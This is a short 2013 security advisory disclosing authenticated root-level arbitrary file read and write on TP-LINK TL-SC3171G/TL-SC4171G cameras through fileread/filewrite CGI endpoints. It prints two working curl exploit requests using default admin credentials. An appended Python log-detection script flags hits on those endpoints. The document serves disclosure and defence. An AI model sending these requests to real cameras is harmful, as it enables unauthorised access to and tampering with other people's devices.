================================================
== Alex Stanev Security Advisory #5 @16.03.2013 ==
== http://sec.stanev.org ==
================================================

PRODUCT
TP-LINK IP camera [TL-SC3171G/TL-SC4171G]

VENDOR
TP-LINK [http://www.tp-link.com]

VERSIONS AFFECTED
1.6.18P7_111209 for model TL-SC3171G
1.6.18P7_111209 for model TL-SC4171G

CLASS
Post auth remote arbitrary file read and write with root privileges

PRODUCT DESCRIPTION
TL-SC3171G is a wireless day/night surveillance IP camera. TL-SC4171G adds a motorized pan/tilt feature. Both cameras are Linux-powered ARM devices.

THE PROBLEM
The firmware exposes "fileread" and "filewrite" CGI applications, allowing arbitrary files to be read and written. It is also possible to extract all user credentials via the configuration interface, where passwords are only base64 encoded.

EXPLOIT
1) Remote file write

$ curl -u "admin:admin" "http://[IP]/cgi-bin/admin/filewrite?SAVE.filePath=/etc/a&SAVE.fileData=Test"

2) Remote file read

$ curl -u "admin:admin" "http://[IP]/cgi-bin/admin/fileread?READ.filePath=/etc/a"
Test

PATCH/WORKAROUND
No workaround possible. Next version?

VENDOR STATUS
NOT informed. Backdoor.

=========================
== EOF ==
== http://sec.stanev.org ==
=========================
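Added example, not part of the advisory: a small detection check that flags any request to the fileread/filewrite CGI endpoints named above in Common Log Format access logs from a reverse proxy or IDS placed in front of the camera, recording the target path and whether the device served the request. The log lines and addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# CGI endpoints named in the advisory, with the query parameter that carries the target path.
WATCHED = {
    "/cgi-bin/admin/filewrite": ("SAVE.filePath", "filewrite"),
    "/cgi-bin/admin/fileread": ("READ.filePath", "fileread"),
}

# Common Log Format as written by a reverse proxy or IDS placed in front of the camera.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    # Split one access-log line into fields; returns None if it is not CLF.
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    # parse_qs percent-decodes values, so an encoded target path is normalised here
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {"src": m.group("src"), "ts": m.group("ts"), "path": parts.path,
            "query": query, "status": int(m.group("status"))}

def find_file_access(lines):
    """Return one finding per request that hit a watched endpoint."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] not in WATCHED:
            continue
        param, kind = WATCHED[rec["path"]]
        findings.append({"src": rec["src"], "ts": rec["ts"], "kind": kind,
                         "target": rec["query"].get(param, ""),
                         "status": rec["status"],
                         # 200 means the camera served it, i.e. the read/write went through
                         "succeeded": rec["status"] == 200})
    return findings

# Constructed sample lines (not real traffic), modelled on the advisory's requests.
SAMPLE_LOG = [
    '203.0.113.5 - admin [16/Mar/2013:10:00:01 +0200] "GET /cgi-bin/admin/filewrite?SAVE.filePath=/etc/a&SAVE.fileData=Test HTTP/1.1" 200 12',
    '203.0.113.5 - admin [16/Mar/2013:10:00:02 +0200] "GET /cgi-bin/admin/fileread?READ.filePath=/etc/a HTTP/1.1" 200 5',
    '198.51.100.7 - - [16/Mar/2013:10:00:03 +0200] "GET /cgi-bin/admin/fileread?READ.filePath=%2Fetc%2Fa HTTP/1.1" 401 0',
    '192.0.2.9 - - [16/Mar/2013:10:00:04 +0200] "GET /index.html HTTP/1.1" 200 1024',
]
if __name__ == "__main__":
    for finding in find_file_access(SAMPLE_LOG):
        print(finding)
```

Because the endpoints have no legitimate use outside vendor maintenance, every hit is worth an alert; a 200 response from the camera should be treated as a successful file read or write.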